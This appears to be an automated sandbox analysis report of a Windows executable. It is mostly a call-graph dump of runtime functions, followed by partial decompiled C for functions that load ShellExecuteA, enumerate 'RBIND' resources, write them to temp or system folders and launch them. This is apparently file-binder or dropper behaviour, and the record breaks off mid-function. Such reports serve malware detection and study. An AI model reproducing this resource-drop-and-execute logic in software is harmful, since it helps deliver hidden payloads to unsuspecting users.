66 API calls 4720->4723 4724 3c6ec8 4721->4724 4725 3c352b _free 66 API calls 4721->4725 4722->4720 4723->4721 4726 3c6eda 4724->4726 4727 3c352b _free 66 API calls 4724->4727 4725->4724 4728 3c6eec 4726->4728 4730 3c352b _free 66 API calls 4726->4730 4727->4726 4729 3c6efe 4728->4729 4731 3c352b _free 66 API calls 4728->4731 4732 3c352b _free 66 API calls 4729->4732 4729->4733 4730->4728 4731->4729 4732->4733 4733->4686 4735 3c6dba 4734->4735 4745 3c6e12 4734->4745 4736 3c6dca 4735->4736 4737 3c352b _free 66 API calls 4735->4737 4738 3c6ddc 4736->4738 4740 3c352b _free 66 API calls 4736->4740 4737->4736 4739 3c6dee 4738->4739 4741 3c352b _free 66 API calls 4738->4741 4742 3c6e00 4739->4742 4743 3c352b _free 66 API calls 4739->4743 4740->4738 4741->4739 4744 3c352b _free 66 API calls 4742->4744 4742->4745 4743->4742 4744->4745 4745->4705 4747 3c5a51 4746->4747 4748 3c6a47 4746->4748 4747->4689 4749 3c352b _free 66 API calls 4748->4749 4750 3c6a4f 4749->4750 4751 3c352b _free 66 API calls 4750->4751 4752 3c6a57 4751->4752 4753 3c352b _free 66 API calls 4752->4753 4754 3c6a5f 4753->4754 4755 3c352b _free 66 API calls 4754->4755 4756 3c6a67 4755->4756 4757 3c352b _free 66 API calls 4756->4757 4758 3c6a6f 4757->4758 4759 3c352b _free 66 API calls 4758->4759 4760 3c6a77 4759->4760 4761 3c352b _free 66 API calls 4760->4761 4762 3c6a7e 4761->4762 4763 3c352b _free 66 API calls 4762->4763 4764 3c6a86 4763->4764 4765 3c352b _free 66 API calls 4764->4765 4766 3c6a8e 4765->4766 4767 3c352b _free 66 API calls 4766->4767 4768 3c6a96 4767->4768 4769 3c352b _free 66 API calls 4768->4769 4770 3c6a9e 4769->4770 4771 3c352b _free 66 API calls 4770->4771 4772 3c6aa6 4771->4772 4773 3c352b _free 66 API calls 4772->4773 4774 3c6aae 4773->4774 4775 3c352b _free 66 API calls 4774->4775 4776 3c6ab6 4775->4776 4777 3c352b _free 66 API calls 4776->4777 4778 3c6abe 4777->4778 4779 3c352b _free 66 API calls 4778->4779 4780 3c6ac6 4779->4780 4781 3c352b _free 66 API calls 4780->4781 4782 3c6ad1 4781->4782 4783 3c352b _free 66 API calls 4782->4783 4784 3c6ad9 4783->4784 4785 3c352b _free 66 API calls 4784->4785 4786 3c6ae1 4785->4786 4787 3c352b _free 66 API calls 4786->4787 4788 3c6ae9 4787->4788 4789 3c352b _free 66 API calls 4788->4789 4790 3c6af1 4789->4790 4791 3c352b _free 66 API calls 4790->4791 4792 3c6af9 4791->4792 4793 3c352b _free 66 API calls 4792->4793 4794 3c6b01 4793->4794 4795 3c352b _free 66 API calls 4794->4795 4796 3c6b09 4795->4796 4797 3c352b _free 66 API calls 4796->4797 4798 3c6b11 4797->4798 4799 3c352b _free 66 API calls 4798->4799 4800 3c6b19 4799->4800 4801 3c352b _free 66 API calls 4800->4801 4802 3c6b21 4801->4802 4803 3c352b _free 66 API calls 4802->4803 4804 3c6b29 4803->4804 4805 3c352b _free 66 API calls 4804->4805 4806 3c6b31 4805->4806 4807 3c352b _free 66 API calls 4806->4807 4808 3c6b39 4807->4808 4809 3c352b _free 66 API calls 4808->4809 4810 3c6b41 4809->4810 4811 3c352b _free 66 API calls 4810->4811 4812 3c6b49 4811->4812 4813 3c352b _free 66 API calls 4812->4813 4814 3c6b57 4813->4814 4815 3c352b _free 66 API calls 4814->4815 4816 3c6b62 4815->4816 4817 3c352b _free 66 API calls 4816->4817 4818 3c6b6d 4817->4818 4819 3c352b _free 66 API calls 4818->4819 4820 3c6b78 4819->4820 4821 3c352b _free 66 API calls 4820->4821 4822 3c6b83 4821->4822 4823 3c352b _free 66 API calls 4822->4823 4824 3c6b8e 4823->4824 4825 3c352b _free 66 API calls 4824->4825 4826 3c6b99 4825->4826 4827 3c352b _free 66 API calls 4826->4827 4828 3c6ba4 4827->4828 4829 3c352b _free 66 API calls 4828->4829 4830 3c6baf 4829->4830 4831 3c352b _free 66 API calls 4830->4831 4832 3c6bba 4831->4832 4833 3c352b _free 66 API calls 4832->4833 4834 3c6bc5 4833->4834 4835 3c352b _free 66 API calls 4834->4835 4836 3c6bd0 4835->4836 4837 3c352b _free 66 API calls 4836->4837 4838 3c6bdb 4837->4838 4839 3c352b _free 66 API calls 4838->4839 4840 3c6be6 4839->4840 4841 3c352b _free 66 API calls 4840->4841 4842 3c6bf1 4841->4842 4843 3c352b _free 66 API calls 4842->4843 4844 3c6bfc 4843->4844 4845 3c352b _free 66 API calls 4844->4845 4846 3c6c0a 4845->4846 4847 3c352b _free 66 API calls 4846->4847 4848 3c6c15 4847->4848 4849 3c352b _free 66 API calls 4848->4849 4850 3c6c20 4849->4850 4851 3c352b _free 66 API calls 4850->4851 4852 3c6c2b 4851->4852 4853 3c352b _free 66 API calls 4852->4853 4854 3c6c36 4853->4854 4855 3c352b _free 66 API calls 4854->4855 4856 3c6c41 4855->4856 4857 3c352b _free 66 API calls 4856->4857 4858 3c6c4c 4857->4858 4859 3c352b _free 66 API calls 4858->4859 4860 3c6c57 4859->4860 4861 3c352b _free 66 API calls 4860->4861 4862 3c6c62 4861->4862 4863 3c352b _free 66 API calls 4862->4863 4864 3c6c6d 4863->4864 4865 3c352b _free 66 API calls 4864->4865 4866 3c6c78 4865->4866 4867 3c352b _free 66 API calls 4866->4867 4868 3c6c83 4867->4868 4869 3c352b _free 66 API calls 4868->4869 4870 3c6c8e 4869->4870 4871 3c352b _free 66 API calls 4870->4871 4872 3c6c99 4871->4872 4873 3c352b _free 66 API calls 4872->4873 4874 3c6ca4 4873->4874 4875 3c352b _free 66 API calls 4874->4875 4876 3c6caf 4875->4876 4877 3c352b _free 66 API calls 4876->4877 4878 3c6cbd 4877->4878 4879 3c352b _free 66 API calls 4878->4879 4880 3c6cc8 4879->4880 4881 3c352b _free 66 API calls 4880->4881 4882 3c6cd3 4881->4882 4883 3c352b _free 66 API calls 4882->4883 4884 3c6cde 4883->4884 4885 3c352b _free 66 API calls 4884->4885 4886 3c6ce9 4885->4886 4887 3c352b _free 66 API calls 4886->4887 4888 3c6cf4 4887->4888 4889 3c352b _free 66 API calls 4888->4889 4890 3c6cff 4889->4890 4891 3c352b _free 66 API calls 4890->4891 4892 3c6d0a 4891->4892 4893 3c352b _free 66 API calls 4892->4893 4894 3c6d15 4893->4894 4895 3c352b _free 66 API calls 4894->4895 4896 3c6d20 4895->4896 4897 3c352b _free 66 API calls 4896->4897 4898 3c6d2b 4897->4898 4899 3c352b _free 66 API calls 4898->4899 4900 3c6d36 4899->4900 4901 3c352b _free 66 API calls 4900->4901 4902 3c6d41 4901->4902 4903 3c352b _free 66 API calls 4902->4903 4904 3c6d4c 4903->4904 4905 3c352b _free 66 API calls 4904->4905 4906 3c6d57 4905->4906 4907 3c352b _free 66 API calls 4906->4907 4908 3c6d62 4907->4908 4909 3c352b _free 66 API calls 4908->4909 4910 3c6d70 4909->4910 4911 3c352b _free 66 API calls 4910->4911 4912 3c6d7b 4911->4912 4913 3c352b _free 66 API calls 4912->4913 4914 3c6d86 4913->4914 4915 3c352b _free 66 API calls 4914->4915 4916 3c6d91 4915->4916 4917 3c352b _free 66 API calls 4916->4917 4918 3c6d9c 4917->4918 4919 3c352b _free 66 API calls 4918->4919 4919->4747 4920->4661 4924 3c3819 LeaveCriticalSection 4921->4924 4923 3c5e38 4923->4639 4924->4923 4926 3c60ab __setmbcp 4925->4926 4927 3c3f5e __getptd 66 API calls 4926->4927 4928 3c60b4 4927->4928 4929 3c5d96 __setmbcp 68 API calls 4928->4929 4930 3c60be 4929->4930 4956 3c5e3a 4930->4956 4933 3c483d __malloc_crt 66 API calls 4934 3c60df 4933->4934 4935 3c61fe __setmbcp 4934->4935 4963 3c5eb6 4934->4963 4935->4600 4938 3c610f InterlockedDecrement 4940 3c611f 4938->4940 4941 3c6130 InterlockedIncrement 4938->4941 4939 3c620b 4939->4935 4942 3c621e 4939->4942 4944 3c352b _free 66 API calls 4939->4944 4940->4941 4946 3c352b _free 66 API calls 4940->4946 4941->4935 4943 3c6146 4941->4943 4945 3c4264 __setmbcp 66 API calls 4942->4945 4943->4935 4948 3c38f2 __lock 66 API calls 4943->4948 4944->4942 4945->4935 4947 3c612f 4946->4947 4947->4941 4950 3c615a InterlockedDecrement 4948->4950 4951 3c61e9 InterlockedIncrement 4950->4951 4952 3c61d6 4950->4952 4973 3c6200 4951->4973 4952->4951 4954 3c352b _free 66 API calls 4952->4954 4955 3c61e8 4954->4955 4955->4951 4957 3c5731 _LocaleUpdate::_LocaleUpdate 76 API calls 4956->4957 4958 3c5e4e 4957->4958 4959 3c5e59 GetOEMCP 4958->4959 4960 3c5e77 4958->4960 4962 3c5e69 4959->4962 4961 3c5e7c GetACP 4960->4961 4960->4962 4961->4962 4962->4933 4962->4935 4964 3c5e3a getSystemCP 78 API calls 4963->4964 4965 3c5ed6 4964->4965 4966 3c5ee1 setSBCS 4965->4966 4969 3c5f25 IsValidCodePage 4965->4969 4971 3c5f4a _memset __setmbcp_nolock 4965->4971 4967 3c2701 __NMSG_WRITE 5 API calls 4966->4967 4968 3c609d 4967->4968 4968->4938 4968->4939 4969->4966 4970 3c5f37 GetCPInfo 4969->4970 4970->4966 4970->4971 4976 3c5c06 GetCPInfo 4971->4976 5037 3c3819 LeaveCriticalSection 4973->5037 4975 3c6207 4975->4935 4978 3c5c3a _memset 4976->4978 4985 3c5cee 4976->4985 4986 3c7229 4978->4986 4981 3c2701 __NMSG_WRITE 5 API calls 4983 3c5d94 4981->4983 4983->4971 4984 3c70fc ___crtLCMapStringA 82 API calls 4984->4985 4985->4981 4987 3c5731 _LocaleUpdate::_LocaleUpdate 76 API calls 4986->4987 4988 3c723c 4987->4988 4996 3c7142 4988->4996 4991 3c70fc 4992 3c5731 _LocaleUpdate::_LocaleUpdate 76 API calls 4991->4992 4993 3c710f 4992->4993 5013 3c6f15 4993->5013 4997 3c716b MultiByteToWideChar 4996->4997 4998 3c7160 4996->4998 4999 3c7198 4997->4999 5008 3c7194 4997->5008 4998->4997 5003 3c3403 _malloc 66 API calls 4999->5003 5007 3c71ad _memset __alloca_probe_16 4999->5007 5000 3c2701 __NMSG_WRITE 5 API calls 5001 3c5ca9 5000->5001 5001->4991 5002 3c71e6 MultiByteToWideChar 5004 3c71fc GetStringTypeW 5002->5004 5005 3c720d 5002->5005 5003->5007 5004->5005 5009 3c5711 5005->5009 5007->5002 5007->5008 5008->5000 5010 3c571d 5009->5010 5012 3c572e 5009->5012 5011 3c352b _free 66 API calls 5010->5011 5010->5012 5011->5012 5012->5008 5014 3c6f33 MultiByteToWideChar 5013->5014 5016 3c6f91 5014->5016 5019 3c6f98 5014->5019 5017 3c2701 __NMSG_WRITE 5 API calls 5016->5017 5018 3c5cc9 5017->5018 5018->4984 5023 3c3403 _malloc 66 API calls 5019->5023 5027 3c6fb1 __alloca_probe_16 5019->5027 5020 3c6fe5 MultiByteToWideChar 5021 3c70dd 5020->5021 5022 3c6ffe LCMapStringW 5020->5022 5025 3c5711 __freea 66 API calls 5021->5025 5022->5021 5024 3c701d 5022->5024 5023->5027 5026 3c7027 5024->5026 5030 3c7050 5024->5030 5025->5016 5026->5021 5028 3c703b LCMapStringW 5026->5028 5027->5016 5027->5020 5028->5021 5029 3c709f LCMapStringW 5031 3c70b5 WideCharToMultiByte 5029->5031 5032 3c70d7 5029->5032 5033 3c706b __alloca_probe_16 5030->5033 5034 3c3403 _malloc 66 API calls 5030->5034 5031->5032 5035 3c5711 __freea 66 API calls 5032->5035 5033->5021 5033->5029 5034->5033 5035->5021 5037->4975 5039 3c33b9 5038->5039 5040 3c33b2 5038->5040 5041 3c4264 __setmbcp 66 API calls 5039->5041 5040->5039 5045 3c33d7 5040->5045 5042 3c33be 5041->5042 5043 3c3d67 _raise 11 API calls 5042->5043 5044 3c33c8 5043->5044 5044->4276 5045->5044 5046 3c4264 __setmbcp 66 API calls 5045->5046 5046->5042 5048 3c42c9 EncodePointer 5047->5048 5048->5048 5049 3c42e3 5048->5049 5049->4289 5053 3c305f 5050->5053 5052 3c30a8 5052->4291 5054 3c306b __setmbcp 5053->5054 5061 3c2c50 5054->5061 5060 3c308c __setmbcp 5060->5052 5062 3c38f2 __lock 66 API calls 5061->5062 5063 3c2c57 5062->5063 5064 3c2f78 DecodePointer DecodePointer 5063->5064 5065 3c2fa6 5064->5065 5066 3c3027 5064->5066 5065->5066 5078 3c491c 5065->5078 5075 3c3095 5066->5075 5068 3c300a EncodePointer EncodePointer 5068->5066 5069 3c2fb8 5069->5068 5072 3c2fdc 5069->5072 5085 3c48ce 5069->5085 5071 3c48ce __realloc_crt 70 API calls 5074 3c2ff2 5071->5074 5072->5066 5072->5071 5073 3c2ff8 EncodePointer 5072->5073 5073->5068 5074->5066 5074->5073 5111 3c2c59 5075->5111 5079 3c493c HeapSize 5078->5079 5080 3c4927 5078->5080 5079->5069 5081 3c4264 __setmbcp 66 API calls 5080->5081 5082 3c492c 5081->5082 5083 3c3d67 _raise 11 API calls 5082->5083 5084 3c4937 5083->5084 5084->5069 5087 3c48d7 5085->5087 5088 3c4916 5087->5088 5089 3c48f7 Sleep 5087->5089 5090 3c664d 5087->5090 5088->5072 5089->5087 5091 3c6658 5090->5091 5092 3c6663 5090->5092 5093 3c3403 _malloc 66 API calls 5091->5093 5094 3c666b 5092->5094 5100 3c6678 5092->5100 5095 3c6660 5093->5095 5096 3c352b _free 66 API calls 5094->5096 5095->5087 5098 3c6673 _free 5096->5098 5097 3c66b0 5099 3c3d86 _malloc DecodePointer 5097->5099 5098->5087 5102 3c66b6 5099->5102 5100->5097 5101 3c6680 HeapReAlloc 5100->5101 5104 3c66e0 5100->5104 5105 3c3d86 _malloc DecodePointer 5100->5105 5108 3c66c8 5100->5108 5101->5098 5101->5100 5103 3c4264 __setmbcp 66 API calls 5102->5103 5103->5098 5106 3c4264 __setmbcp 66 API calls 5104->5106 5105->5100 5107 3c66e5 GetLastError 5106->5107 5107->5098 5109 3c4264 __setmbcp 66 API calls 5108->5109 5110 3c66cd GetLastError 5109->5110 5110->5098 5114 3c3819 LeaveCriticalSection 5111->5114 5113 3c2c60 5113->5060 5114->5113 5116 3c1ef1 5115->5116 5157 3c1420 5116->5157 5118 3c1f1a 5171 3c1ad0 5118->5171 5120 3c1420 77 API calls 5122 3c1fd9 5120->5122 5121 3c1f28 moneypunct _memmove 5121->5120 5123 3c1ad0 82 API calls 5122->5123 5124 3c1fe7 moneypunct _memmove 5123->5124 5125 3c20c7 5124->5125 5127 3c20fe 5124->5127 5187 3c1e20 GetTempPathA 5125->5187 5128 3c213f 5127->5128 5129 3c217b 5127->5129 5193 3c1c50 SHGetSpecialFolderPathA 5128->5193 5133 3c218e 5129->5133 5134 3c21ca 5129->5134 5131 3c2701 __NMSG_WRITE 5 API calls 5132 3c1360 EnumResourceNamesA FreeLibrary 5131->5132 5132->4197 5135 3c1c50 78 API calls 5133->5135 5136 3c21dd 5134->5136 5137 3c224e 5134->5137 5142 3c20d0 moneypunct 5135->5142 5203 3c1da0 GetWindowsDirectoryA 5136->5203 5139 3c2276 5137->5139 5140 3c2261 5137->5140 5144 3c229e 5139->5144 5145 3c2289 5139->5145 5141 3c1c50 78 API calls 5140->5141 5141->5142 5142->5131 5143 3c21e6 moneypunct 5146 3c2219 5143->5146 5147 3c2235 5143->5147 5151 3c22c6 5144->5151 5152 3c22b1 5144->5152 5148 3c1c50 78 API calls 5145->5148 5209 3c2440 5146->5209 5150 3c1420 77 API calls 5147->5150 5148->5142 5150->5142 5212 3c1390 5151->5212 5153 3c1c50 78 API calls 5152->5153 5153->5142 5156 3c1ad0 82 API calls 5156->5142 5158 3c1427 5157->5158 5159 3c1472 5157->5159 5158->5159 5163 3c144d 5158->5163 5160 3c1481 5159->5160 5230 3c2646 5159->5230 5168 3c1493 5160->5168 5237 3c1690 5160->5237 5164 3c1462 5163->5164 5165 3c1452 5163->5165 5167 3c14f0 77 API calls 5164->5167 5216 3c14f0 5165->5216 5170 3c1470 5167->5170 5168->5118 5169 3c1460 5169->5118 5170->5118 5172 3c1b1a FindResourceA 5171->5172 5173 3c1b17 5171->5173 5174 3c1b2c 5172->5174 5175 3c1b58 LoadResource 5172->5175 5173->5172 5176 3c1420 77 API calls 5174->5176 5177 3c1b8f SizeofResource LockResource 5175->5177 5178 3c1b66 5175->5178 5182 3c1b45 moneypunct 5176->5182 5180 3c1bc1 _memset _memmove 5177->5180 5179 3c1420 77 API calls 5178->5179 5179->5182 5184 3c1bd5 FreeResource 5180->5184 5181 3c2701 __NMSG_WRITE 5 API calls 5183 3c1c42 5181->5183 5182->5181 5183->5121 5185 3c1c00 5184->5185 5185->5185 5186 3c1420 77 API calls 5185->5186 5186->5182 5188 3c1e70 5187->5188 5188->5188 5189 3c1420 77 API calls 5188->5189 5190 3c1e86 5189->5190 5191 3c2701 __NMSG_WRITE 5 API calls 5190->5191 5192 3c1e94 5191->5192 5192->5142 5194 3c1cc0 5193->5194 5194->5194 5195 3c1420 77 API calls 5194->5195 5196 3c1cd6 5195->5196 5197 3c2440 77 API calls 5196->5197 5198 3c1cfb moneypunct 5197->5198 5199 3c1d7b 5198->5199 5304 3c2470 5198->5304 5200 3c2701 __NMSG_WRITE 5 API calls 5199->5200 5202 3c1d95 5200->5202 5202->5142 5204 3c1df0 5203->5204 5204->5204 5205 3c1420 77 API calls 5204->5205 5206 3c1e06 5205->5206 5207 3c2701 __NMSG_WRITE 5 API calls 5206->5207 5208 3c1e14 5207->5208 5208->5143 5210 3c14f0 77 API calls 5209->5210 5211 3c2463 5210->5211 5211->5142 5213 3c13b0 5212->5213 5213->5213 5214 3c1420 77 API calls 5213->5214 5215 3c13c0 5214->5215 5215->5156 5217 3c150b 5216->5217 5218 3c1501 5216->5218 5220 3c1517 5217->5220 5221 3c1533 5217->5221 5248 3c2693 5218->5248 5255 3c1620 5220->5255 5222 3c1542 5221->5222 5224 3c2646 std::_Xinvalid_argument 67 API calls 5221->5224 5227 3c1690 77 API calls 5222->5227 5229 3c1554 5222->5229 5224->5222 5225 3c1522 5226 3c1620 67 API calls 5225->5226 5228 3c152b 5226->5228 5227->5229 5228->5169 5229->5169 5231 3c2798 std::exception::exception 66 API calls 5230->5231 5232 3c2660 5231->5232 5233 3c3252 __CxxThrowException@8 RaiseException 5232->5233 5234 3c2675 5233->5234 5235 3c2826 std::exception::exception 66 API calls 5234->5235 5236 3c2686 5235->5236 5236->5160 5239 3c16cb 5237->5239 5238 3c170d 5240 3c2798 std::exception::exception 66 API calls 5238->5240 5243 3c1714 moneypunct 5238->5243 5239->5238 5239->5243 5284 3c2ef8 5239->5284 5242 3c172c 5240->5242 5244 3c3252 __CxxThrowException@8 RaiseException 5242->5244 5243->5168 5245 3c1741 5244->5245 5296 3c1800 5245->5296 5259 3c2798 5248->5259 5252 3c26c2 5265 3c2826 5252->5265 5256 3c162a 5255->5256 5258 3c1634 _memmove 5255->5258 5257 3c2693 std::_Xinvalid_argument 67 API calls 5256->5257 5257->5258 5258->5225 5268 3c273a 5259->5268 5262 3c3252 5263 3c327b 5262->5263 5264 3c3287 RaiseException 5262->5264 5263->5264 5264->5252 5274 3c27bf 5265->5274 5269 3c2748 _strlen 5268->5269 5270 3c26ad 5268->5270 5271 3c3403 _malloc 66 API calls 5269->5271 5270->5262 5272 3c275a 5271->5272 5272->5270 5273 3c33a4 _strcpy_s 66 API calls 5272->5273 5273->5270 5275 3c26d3 5274->5275 5276 3c27cf 5274->5276 5275->5217 5280 3c277a 5276->5280 5279 3c273a std::exception::_Copy_str 66 API calls 5279->5275 5281 3c278e 5280->5281 5282 3c2785 5280->5282 5281->5275 5281->5279 5283 3c352b _free 66 API calls 5282->5283 5283->5281 5287 3c2f02 5284->5287 5285 3c3403 _malloc 66 API calls 5285->5287 5286 3c2f1c 5286->5238 5287->5285 5287->5286 5288 3c3d86 _malloc DecodePointer 5287->5288 5291 3c2f1e std::exception::exception 5287->5291 5288->5287 5289 3c2f5c 5290 3c2826 std::exception::exception 66 API calls 5289->5290 5292 3c2f66 5290->5292 5291->5289 5293 3c309b __cinit 76 API calls 5291->5293 5294 3c3252 __CxxThrowException@8 RaiseException 5292->5294 5293->5289 5295 3c2f77 5294->5295 5297 3c180c 5296->5297 5298 3c1756 5296->5298 5299 3c2ef8 77 API calls 5297->5299 5301 3c1817 5297->5301 5298->5168 5299->5301 5300 3c2798 std::exception::exception 66 API calls 5302 3c1831 5300->5302 5301->5298 5301->5300 5303 3c3252 __CxxThrowException@8 RaiseException 5302->5303 5303->5298 5305 3c247b 5304->5305 5306 3c24b9 5305->5306 5311 3c249c 5305->5311 5307 3c24cf 5306->5307 5308 3c2646 std::_Xinvalid_argument 67 API calls 5306->5308 5309 3c24de 5307->5309 5322 3c15d0 5307->5322 5308->5307 5309->5199 5314 3c2530 5311->5314 5313 3c24b7 5313->5199 5315 3c254d 5314->5315 5316 3c2543 5314->5316 5318 3c256b 5315->5318 5320 3c2646 std::_Xinvalid_argument 67 API calls 5315->5320 5317 3c2693 std::_Xinvalid_argument 67 API calls 5316->5317 5317->5315 5319 3c257a 5318->5319 5321 3c15d0 77 API calls 5318->5321 5319->5313 5320->5318 5321->5319 5323 3c15df 5322->5323 5324 3c15d5 5322->5324 5326 3c15fa 5323->5326 5327 3c1690 77 API calls 5323->5327 5325 3c2646 std::_Xinvalid_argument 67 API calls 5324->5325 5325->5323 5326->5309 5328 3c15f1 5327->5328 5328->5309 5330 3c2d5c __setmbcp 5329->5330 5331 3c38f2 __lock 61 API calls 5330->5331 5332 3c2d63 5331->5332 5333 3c2d8e DecodePointer 5332->5333 5336 3c2e0d 5332->5336 5335 3c2da5 DecodePointer 5333->5335 5333->5336 5348 3c2db8 5335->5348 5350 3c2e7b 5336->5350 5338 3c2e8a __setmbcp 5338->4309 5340 3c2e72 5342 3c2e7b 5340->5342 5343 3c2c38 _doexit 3 API calls 5340->5343 5344 3c2e88 5342->5344 5357 3c3819 LeaveCriticalSection 5342->5357 5343->5342 5344->4309 5345 3c2dcf DecodePointer 5356 3c3dae RtlEncodePointer 5345->5356 5348->5336 5348->5345 5349 3c2dde DecodePointer DecodePointer 5348->5349 5355 3c3dae RtlEncodePointer 5348->5355 5349->5348 5351 3c2e5b 5350->5351 5352 3c2e81 5350->5352 5351->5338 5354 3c3819 LeaveCriticalSection 5351->5354 5358 3c3819 LeaveCriticalSection 5352->5358 5354->5340 5355->5348 5356->5348 5357->5344 5358->5351 5360 3c2d50 _doexit 66 API calls 5359->5360 5361 3c2eb7 5360->5361 5742 3c1850 5743 3c2826 std::exception::exception 66 API calls 5742->5743 5744 3c185f 5743->5744 5845 3c2bcc 5848 3c2bbc 5845->5848 5847 3c2bd9 moneypunct 5851 3c3678 5848->5851 5850 3c2bca 5850->5847 5852 3c3684 __setmbcp 5851->5852 5853 3c38f2 __lock 66 API calls 5852->5853 5857 3c368b 5853->5857 5854 3c36c4 5861 3c36df 5854->5861 5856 3c36d5 __setmbcp 5856->5850 5857->5854 5859 3c352b _free 66 API calls 5857->5859 5860 3c36bb 5857->5860 5858 3c352b _free 66 API calls 5858->5854 5859->5860 5860->5858 5864 3c3819 LeaveCriticalSection 5861->5864 5863 3c36e6 5863->5856 5864->5863 5745 3c494f 5746 3c498b 5745->5746 5747 3c4961 5745->5747 5747->5746 5748 3c3925 __CxxUnhandledExceptionFilter 68 API calls 5747->5748 5748->5746 5749 3c3248 5752 3c5173 5749->5752 5751 3c324d 5751->5751 5753 3c5198 5752->5753 5754 3c51a5 GetSystemTimeAsFileTime GetCurrentProcessId GetCurrentThreadId GetTickCount QueryPerformanceCounter 5752->5754 5753->5754 5755 3c519c 5753->5755 5754->5755 5755->5751 5756 3c8548 5757 3c2701 __NMSG_WRITE 5 API calls 5756->5757 5758 3c8559 5757->5758 5759 3c3949 5760 3c394c 5759->5760 5761 3c5372 _abort 68 API calls 5760->5761 5762 3c3958 __setmbcp 5761->5762 5870 3c17c4 5871 3c17cd moneypunct 5870->5871 5872 3c3252 __CxxThrowException@8 RaiseException 5871->5872 5873 3c17f2 5872->5873 5371 3c10c0 5372 3c111a _memset 5371->5372 5387 3c23a0 5372->5387 5376 3c1136 moneypunct 5376->5376 5377 3c1420 77 API calls 5376->5377 5378 3c11dc OutputDebugStringA 5377->5378 5380 3c1204 moneypunct 5378->5380 5381 3c1213 7 API calls 5378->5381 5380->5381 5382 3c1285 5381->5382 5383 3c12c2 ShellExecuteA 5382->5383 5384 3c12d9 moneypunct 5382->5384 5383->5384 5385 3c2701 __NMSG_WRITE 5 API calls 5384->5385 5386 3c130d 5385->5386 5388 3c14f0 77 API calls 5387->5388 5389 3c1128 5388->5389 5390 3c2370 5389->5390 5391 3c14f0 77 API calls 5390->5391 5392 3c2397 5391->5392 5392->5376 5882 3c37c2 5883 3c37d2 5882->5883 5884 3c37de DeleteCriticalSection 5883->5884 5885 3c37f6 5883->5885 5886 3c352b _free 66 API calls 5884->5886 5887 3c3808 DeleteCriticalSection 5885->5887 5888 3c3816 5885->5888 5886->5883 5887->5885

                                                    Executed Functions

                                                    Function 003C1320 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 25libraryloaderCOMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    C-Code - Quality: 100%
                                                    			E003C1320(intOrPtr __edx) {
				struct HINSTANCE__* _t1;
				_Unknown_base(*)()* _t2;
				struct HINSTANCE__* _t5;
				intOrPtr _t8;

				_t8 = __edx;
				_t1 = LoadLibraryA("shell32.dll");
				 *0x3ce940 = _t1;
				if(_t1 == 0) {
					_t1 = E003C2E90(_t1);
				}
				_t2 = GetProcAddress(_t1, "ShellExecuteA");
				 *0x3ce944 = _t2;
				if(__imp__ShellExecuteA == 0) {
					E003C2E90(0);
				}
				E003C1EB0(_t8, __imp__ShellExecuteA);
				EnumResourceNamesA(0, "RBIND", E003C10C0, 0);
				_t5 =  *0x3ce940; // 0x75390000
				return FreeLibrary(_t5);
			}







                                                    0x003c1320
                                                    0x003c1325
                                                    0x003c132b
                                                    0x003c1332
                                                    0x003c1335
                                                    0x003c1335
                                                    0x003c1340
                                                    0x003c134d
                                                    0x003c1352
                                                    0x003c1356
                                                    0x003c1356
                                                    0x003c135b
                                                    0x003c136e
                                                    0x003c1374
                                                    0x003c1380

                                                    APIs
                                                    • LoadLibraryA.KERNEL32(shell32.dll,003C31F5,003C0000,00000000,00000000,0000000A), ref: 003C1325
                                                    • GetProcAddress.KERNEL32(?,ShellExecuteA), ref: 003C1340
                                                    • EnumResourceNamesA.KERNEL32 ref: 003C136E
                                                    • FreeLibrary.KERNEL32(75390000,?,ShellExecuteA), ref: 003C137A
                                                      • Part of subcall function 003C2E90: _doexit.LIBCMT ref: 003C2E9C
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.330399908.00000000003C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 003C0000, based on PE: true
                                                    • Associated: 00000006.00000002.330385524.00000000003C0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 00000006.00000002.330463790.00000000003C9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 00000006.00000002.330534847.00000000003CD000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 00000006.00000002.330595199.00000000003CF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_3c0000_UNK_.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Library$AddressEnumFreeLoadNamesProcResource_doexit
                                                    • String ID: RBIND$ShellExecuteA$shell32.dll
                                                    • API String ID: 2421111958-1274833461
                                                    • Opcode ID: 0a4a16954f388ae6fa05230756437b6a5d41e5a81e01f400ef11a0b9cd90afc7
                                                    • Instruction ID: ad95c464750cb9c602fd31bade1e95c2b3b1760a84c19e7ca947a6cf37c70a78
                                                    • Opcode Fuzzy Hash: 0a4a16954f388ae6fa05230756437b6a5d41e5a81e01f400ef11a0b9cd90afc7
                                                    • Instruction Fuzzy Hash: 74F0ED75A41321A7D763BBB09C0FF8B76AD7710706F06040AF905E51A2DBB5B8409B26
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 003C10C0 Relevance: 19.4, APIs: 10, Strings: 1, Instructions: 181fileCOMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    C-Code - Quality: 75%
                                                    			E003C10C0(void* __eflags, CHAR* _a8, void* _a12) {
				void* _v8;
				char _v16;
				signed int _v20;
				char _v279;
				char _v280;
				intOrPtr _v288;
				void* _v292;
				CHAR* _v308;
				intOrPtr _v316;
				intOrPtr _v320;
				char _v336;
				CHAR* _v340;
				CHAR* _v344;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t48;
				signed int _t49;
				intOrPtr* _t54;
				void* _t55;
				unsigned int _t56;
				void* _t59;
				CHAR* _t63;
				void* _t66;
				long _t67;
				intOrPtr _t72;
				void* _t86;
				char _t88;
				void _t89;
				void _t90;
				signed int _t92;
				void _t97;
				void* _t106;
				void* _t107;
				void* _t108;
				void* _t113;
				void* _t115;
				void* _t121;
				void* _t123;
				void* _t128;
				struct HRSRC__* _t131;
				intOrPtr _t132;
				void* _t133;
				signed int _t134;
				void* _t135;
				void* _t137;
				void* _t139;

				_push(0xffffffff);
				_push(E003C85CB);
				_push( *[fs:0x0]);
				_t48 =  *0x3cd07c; // 0xbd8f316a
				_t49 = _t48 ^ _t134;
				_v20 = _t49;
				_push(_t49);
				 *[fs:0x0] =  &_v16;
				_t113 = _a12;
